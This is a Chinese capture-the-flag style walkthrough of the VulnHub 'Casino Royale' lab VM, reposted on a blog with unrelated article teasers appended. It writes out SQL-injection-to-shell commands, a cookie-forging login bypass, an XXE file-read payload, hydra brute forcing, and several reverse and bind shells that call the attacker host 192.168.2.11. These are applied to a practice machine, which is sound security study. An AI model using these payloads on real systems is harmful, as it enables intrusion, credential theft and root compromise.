Casino Royale靶场wp

0x00 下载安装

https://download.vulnhub.com/casinoroyale/CasinoRoyale.ova

导入vmware启动

0x01 主机信息收集

0x02目录扫描

index.php 获取到一个域名

修改本地hosts 添加一行

路径:C:\Windows\System32\drivers\etc

192.168.2.20 casino-royale.local

点击view,有点像sql查询,抓包看看

很像注入点,sqlmap嗦一把,

一个延迟注入

获取了三个用户

--os-shell 写不进去 可能是我重启过靶机应该可以写入的

只能用个sqlshell

select @@datadir: '/var/lib/mysql/' 文件写不进去,换个方向

install 一个安装PokerMax Pro Poker League Software页面

查找到一个漏洞 PokerMax Poker League 0.13 - Insecure Cookie Handling - PHP webapps Exploit 添加cookie 获得管理员登录

8081端口,没看出来啥,执行了是一个日志的东西

0x03绕过

1. 通过sql注入绕过

这里看前面大佬有搜到源码,现在搜不到了

/pokeradmin/configure.php 登陆处存在注入,并且未做sql注入防护

sqlmap -u http://casino-royale.local/pokeradmin/ --level=5 --risk=3 --os-shell --batch --forms

通过wget下载一句话木马,wget http://192.168.2.11/1.txt mv 1.txt 1.php 重命名

路径为 http://casino-royale.local/pokeradmin/1.php 可以通过os-shell获取路径

获取到数据库账户密码 valenka 11archives11

2.漏洞绕过

查找历史漏洞

searchsploit PokerMax

searchsploit -m php/webapps/6766.txt

在浏览器f12控制台执行js脚本

javascript:document.cookie = "ValidUserAdmin=admin";

重新访问,成功绕过登录

得到用户名 密码 admin raise12million

只有Valenka里面有东西

得到一个路径

需要使用域名,把路径加到后面 http://casino-royale.local/vip-client-portfolios/?uri=blog

有登录 注册 重置

密码不知道,重置密码,发送到了管理员账户,

找一下漏洞。

有一个csrf

Snowfox CMS 查找cms漏洞。有一个csrf

Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin) - PHP webapps Exploit

EHLO test5
MAIL FROM:obanno@bond.com
RCPT TO:valenka
DATA
Subject:obanno
http://192.168.2.11/index.html
obanno
kthxbai

.

发了n个邮件,一个也没成功 跳过了 登录获取到路径

view-source:http://casino-royale.local//ultra-access-view/main.php

查看源代码 是一个xxe 可以读取文件

写入修改为post 用户名为

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" >]> <creds> <customer>&file;</customer> <password>mypass</password> </creds>

ftpUserULTRA 提到密码很简单,来一波爆破

hydra -l ftpUserULTRA -P ignis-1K.txt ftp://192.168.2.21

得到密码为 ftpUserULTRA bankbank

三个文件

perl文件 刚好是该目录下 http://casino-royale.local/ultra-access-view/hello_world.pl 文件可以被执行,权限可读可执行,,想办法写入反弹shell

直接找了个大马,上传,webshell/pl/pps-pl/pps-v4.0.pl at master · tennc/webshell · GitHub

执行反弹shell

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' ;

0x04 获取le权限

查找可提权文件,

find / -type f -user root -perm -o=w 2>/dev/null | grep -v 'proc\|sys'

开启监听

反弹shell提权 没啥用,没得到权限

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/192.168.2.11/11111 0>&1' \;

查找可提权文件

find / -user root -perm -4000 -print 2>/dev/null

发现一个路径/opt/casino-royale/mi6_detect_test 这几个文件的权限很特别

这正好是8081端口运行的服务,点击跳转到http://casino-royale.local:8081/collect.php

查看源码,该文件会执行目录下的py文件,不可修改

点击按钮,会跳转运行collect.php ,执行 casino-data-collection.py 我们直接写入python反弹shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.11",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

启动监听,获取shell,得到le权限,接下来要获取root

0x05 获取root权限

mi6_detect_test为root所有,会执行run.sh文件,我们通过echo命令开一个正向连接,写入run.sh在运行mi6既可获取到root权限 echo "nc -lvvp 1234 -t -e /bin/bash" >> run.sh

成功拿下

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/64538.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

智能家居体验大变革 博联 AI 方案让智能不再繁琐

1. 全球AI技术发展背景及智能家居市场趋势 人工智能&#xff08;AI&#xff09;技术的飞速发展正在推动全球各行业的数字化转型。国际电信联盟与德勤联合发布《人工智能向善影响》报告指出&#xff0c;全球94%的商界领袖认为&#xff0c;人工智能技术对于其企业在未来5年内的发…

鸿蒙开发(27)案例今日任务

案例为纯前端实现&#xff0c;总结案例。 主页面代码 import { TaskStatisties } from ../view/TaskStatisties import { TaskItem } from ../view/TaskItem import CreateTaskModel, {TaskModel} from ../viewmodel/TaskModel import { router } from kit.ArkUI// xxx.ets En…

WPF编程excel表格操作

WPF编程excel表格操作 摘要NPOI安装封装代码测试代码 摘要 Excel操作几种方式 使用开源库NPOI(常用&#xff0c;操作丰富)使用Microsoft.Office.Interop.Excel COM组件(兼容性问题)使用OpenXml(效率高)使用OleDb(过时) NPOI安装 封装代码 using System; using System.IO; u…

tcp_rcv_synsent_state_process函数

tcp_rcv_synsent_state_process 是 Linux Kernel 中用于处理 TCP 连接在 SYN-SENT 状态下接收到报文的函数。这个函数在 TCP 三次握手阶段起到了至关重要的作用,处理了在客户端发送 SYN 请求之后收到服务器响应报文的各种情况。 以下是这个函数的解读和剖析: int tcp_rcv_sy…

音视频采集推流时间戳记录方案

音视频同步更多文章 深入理解音视频pts&#xff0c;dts&#xff0c;time_base以及时间数学公式_视频pts计算-CSDN博客 ffplay音视频同步分析_ffplay 音视频同步-CSDN博客 音视频采集打时间戳设计 实时音视频数据的采集和处理场景。具体来说: 采集阶段: 在音视频数据采集过…

Spark Runtime Filter

Runtime Filter 参考链接&#xff1a; https://docs.google.com/document/d/16IEuyLeQlubQkH8YuVuXWKo2-grVIoDJqQpHZrE7q04/edit?tabt.0https://www.modb.pro/db/557718https://issues.apache.org/jira/browse/SPARK-32268https://github.com/apache/spark/pull/35789https…

从0入门自主空中机器人-1【课程介绍】

关于本课程&#xff1a; 本次课程是一套面向对自主空中机器人感兴趣的学生、爱好者、相关从业人员的免费课程&#xff0c;包含了从硬件组装、机载电脑环境设置、代码部署、实机实验等全套详细流程&#xff0c;带你从0开始&#xff0c;组装属于自己的自主无人机&#xff0c;并让…

专业140+总分410+南京大学851信号与系统考研经验南大电子信息通信集成电路,真题,大纲。参考书。

本人本科中等211&#xff0c;离保送本校差一点&#xff0c;考研前纠结本校还是追求更高目标&#xff0c;和家人聊了自己的想法&#xff0c;感谢父母对我的支持&#xff0c;坚定报考南大的目标&#xff0c;最终专业851信号与系统140&#xff0c;总分410顺利被南京大学录取&#…

【C++】初识C++之C语言加入光荣的进化(上)

写在前面 本篇笔记作为C的开篇笔记&#xff0c;主要是讲解C关键字(C98)连带一点点(C11)的知识。掌握的C新语法新特性&#xff0c;当然C是兼容C的&#xff0c;我们学习C的那套在C中也是受用。 ps:点我跳转下集 文章目录 写在前面一、命名空间域1.1、命名空间域的定义与使用1.2…

CGAL windows 安装教程

1.下载源代码 CGAL官网下载https://github.com/CGAL/cgal/releases 2.下载boost库 BOOST官网下载https://www.boost.org/ 3.下载 GMP and MPFR 4.配置VS2022 头文件&#xff1a; 库路径 做完以上步骤&#xff0c;可以使用CGAL了&#xff01;

从0入门自主空中机器人-2-2【无人机硬件选型-PX4篇】

1. 常用资料以及官方网站 无人机飞控PX4用户使用手册&#xff08;无人机基本设置、地面站使用教程、软硬件搭建等&#xff09;&#xff1a;https://docs.px4.io/main/en/ PX4固件开源地址&#xff1a;https://github.com/PX4/PX4-Autopilot 飞控硬件、数传模块、GPS、分电板等…

每天40分玩转Django:Django缓存

一、Django缓存概述 在高并发的Web应用中,缓存是提高性能的重要手段。通过缓存频繁访问的数据,可以显著减少数据库查询和渲染模板的时间,从而加快响应速度,提升用户体验。Django提供了多层级的缓存方案,可以灵活地满足不同场景下的缓存需求。 Django支持的缓存方式包括: 视图…

GraphRAG 框架哪家强?选择最适合你智能问答系统的框架

GraphRAG 框架哪家强&#xff1f;选择最适合你智能问答系统的框架 点击进入&#xff1a;GraphRAG系列文章-Nano-GraphRAG&#xff1a;打造轻量级医疗诊断助手 点击进入&#xff1a;GraphRAG系列文章-突破传统知识管理瓶颈&#xff1a;LlamaIndex GraphRAG 让企业知识问答更智能…

Mac电脑python多版本环境安装与切换

我当前是python3.9.6环境&#xff0c;需要使用3.9.8环境&#xff0c;通过brew安装3.9.8版本&#xff0c;然后通过pyenv切换环境 步骤 1: 安装 pyenv brew install pyenv brew install pyenv-virtualenv 步骤 2: 安装 Python 3.9.8&#xff08;使用 pyenv 安装指定版本的 Pyth…

Redis--持久化策略(AOF与RDB)

持久化策略&#xff08;AOF与RDB&#xff09; 持久化Redis如何实现数据不丢失&#xff1f;RDB 快照是如何实现的呢&#xff1f;执行时机RDB原理执行快照时&#xff0c;数据能被修改吗&#xff1f; AOF持久化是怎么实现的&#xff1f;AOF原理三种写回策略AOF重写机制 RDB和AOF合…

C高级:思维导图Day2

目录 总览1 总览2 总览1 压缩与解压缩 打包与解包 软连接与硬链接 ubuntu下关机与重启指令 总览2 结束

pwntools用法

pwntools 是一个Python库&#xff0c; 用于编写二进制漏洞利用&#xff08;exploitation&#xff09;脚本 功能&#xff1a; 远程连接和本地连接&#xff1a; 支持通过TCP/UDP连接远程服务或与本地进程进行交互。Shellcode和ROP链构造&#xff1a; 提供了便捷的工具来生成和利…

【每日学点鸿蒙知识】placement设置top、组件携带自定义参数、主动隐藏输入框、Web设置字体、对话框设置全屏宽

1、popup组件placement设置top没有生效&#xff1f; 可以用offset属性将popup往下边偏移一下 来规避 2、组件携带自定义参数的接口是哪个&#xff1f; 参考链接&#xff1a;https://developer.huawei.com/consumer/cn/doc/harmonyos-references-V5/ts-universal-attributes-…

PyTorch快速入门教程【小土堆】之优化器

视频地址优化器&#xff08;一&#xff09;_哔哩哔哩_bilibili import torch import torchvision from torch import nn from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential from torch.utils.data import DataLoaderdataset torchvision.datasets.CIFAR1…

数据库篇:mysql内置函数

前言 sql 是程序开发员绕不开的一项技能&#xff0c;而mysql是当前最流行的数据库&#xff0c;熟知其内置的一些函数&#xff0c;可以使我们平时的开发工作更加顺畅和方便 时间日期函数 字符串函数 数学计算相关函数 条件判断函数 加密和压缩函数 聚合函数 格式或类型转…